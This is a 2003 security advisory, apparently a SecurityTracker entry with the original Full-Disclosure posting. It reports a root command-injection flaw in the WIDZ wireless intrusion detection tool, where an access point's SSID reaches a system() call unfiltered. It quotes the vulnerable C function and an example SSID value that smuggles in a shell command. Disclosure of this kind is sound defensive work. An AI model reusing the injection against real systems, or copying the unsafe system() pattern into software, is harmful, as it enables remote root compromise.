WIDZ Intrusion Detection Input Validation Flaw Lets Remote Users Execute Arbitrary Code With Root Privileges
|
|
SecurityTracker Alert ID: 1007559
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Aug 25 2003
|
Impact: Execution of arbitrary code via network, Root access via network
|
Exploit Included: Yes
Vendor Confirmed: Yes
|
Advisory: Strategic Reconnaissance Team
|
Version(s): 1.5 and prior versions
|
Description: A vulnerability was reported in the WIDZ wireless intrusion detection software. A remote user can execute arbitrary commands on the system.
Secure Network Operations Strategic Reconnaissance Team reported that the software does not filter user-supplied input before making
a system() call based on the unfiltered input. A remote user can set the service set identifier (SSID) on an 802.11b wireless network
to a value containing arbitrary system commands (e.g., "';/usr/bin/id;"). Then, when the WIDZ application detects the network,
the system commands will be executed with root privileges.
The flaw reportedly resides in the do_alert() function in the 'widz_apmon.c'
file and is triggered when an unknown access point is detected. The name of the access point is not escaped or filtered and is
included as part of a string that is provided to a system() call.
|
Impact: A remote user can execute arbitrary system commands on the target system with root privileges.
|
Solution: No solution was available at the time of this entry. The vendor reportedly plans to issue a fix within a few weeks (as of July 26, 2003).
|
Vendor URL: www.loud-fat-bloke.co.uk/w80211.html (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: KF <dotslash@snosoft.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Fri, 22 Aug 2003 20:31:36 -0500
From: KF <dotslash@snosoft.com>
Subject: [Full-Disclosure] SRT2003-08-22-104 - Wireless Intrusion dection remote root compromise
|
This is a multi-part message in MIME format.
--------------070501050903050206010507
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
http://www.secnetops.biz/products/
http://www.secnetops.biz/research/
--------------070501050903050206010507
Content-Type: text/plain;
name="SRT2003-08-22-104.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="SRT2003-08-22-104.txt"
Secure Network Operations, Inc. http://www.secnetops.com
Strategic Reconnaissance Team research@secnetops.com
Team Lead Contact kf@secnetops.com
Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security. Our mission is to facilitate a
secure and reliable Internet and inter-enterprise communications
infrastructure through the products and services we offer.
Quick Summary:
************************************************************************
Advisory Number : SRT2003-08-22-104
Product : widz (802.11 wireless IDS)
Version : <= v1.5
Vendor : http://www.loud-fat-bloke.co.uk/w80211.html
Class : remote
Criticality : High
Operating System(s) : *nix
High Level Explanation
************************************************************************
High Level Description : widz make use of untrusted input with system()
What to do : do not use widz in a production environment
Technical Details
************************************************************************
Proof Of Concept Status : SNO has PoC code for this issue
Low Level Description :
WIDZ, "the first OpenSource wireless IDS" has the ability to Detects Rogue
APs and Monkey-jacks. Null probes , floods, and it has a Mac Backlist and
ESSID blacklist so you can catch the obvious badguys.
from the file READMEwidz.txt we learn the following about widz_apmon.c
This sad little program monitors an area for Access Points
If finds an ap it compares it to a list of Authorised APs in a config file
if the AP isnt in list it calls a program called Alert with an appropriate
message.
If you give widz_apmon a little test drive you will get the following.
snifz0r widz # ./widz_apmon 1 eth1 monitor
unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55
unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55
unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55
unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55
unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55
unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55
...
I wonder how that alert gets generated...
File: widz_apmon.c
do_alert(char *target)
{
char mess[100];
if ( DEBUG )
printf("Alert unknown AP %s\n", target);
sprintf(mess,"Alert 'unknown AP %s\n'", target);
system(mess);
// Should do a check to see if we've alerted already but !!!
}
Hrmm thats no good... but fun to play with non the less.
Go to apple airport and set network name to ';/usr/bin/id;
(hint: use HostAP instead)
snifz0r widz # ./widz_apmon 1 eth1 monitor
unknown AP essid=
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh: -c: line 3: unexpected EOF while looking for matching `''
sh: -c: line 4: syntax error: unexpected end of file
At this point the attacker can pretty much do what they wish. As a side note this is
not the only WIDZ program to make use of system() in this manor.
Patch or Workaround : update will be in final version of widz
Vendor Status : fix available "in the next couple of weeks" as of 07/26/03
Bugtraq URL : to be assigned
------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.
--------------070501050903050206010507--
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
